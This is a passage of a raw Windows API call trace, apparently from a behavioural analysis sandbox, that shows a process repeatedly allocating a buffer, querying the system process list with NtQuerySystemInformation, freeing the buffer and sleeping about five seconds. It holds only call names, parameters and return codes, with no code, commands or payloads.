RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.275] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.276] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.278] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.279] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.283] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.286] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.286] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.292] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.299] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.306] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.308] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.309] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.313] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.315] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.316] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.316] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.322] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.329] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.331] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.352] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.354] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.355] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.355] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.355] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.361] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.369] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.382] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.384] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.384] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.388] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.389] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.396] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.398] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.403] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.405] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.410] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.417] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.418] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.419] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.423] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.423] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.429] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.430] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.432] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.433] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.437] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.439] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.440] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) 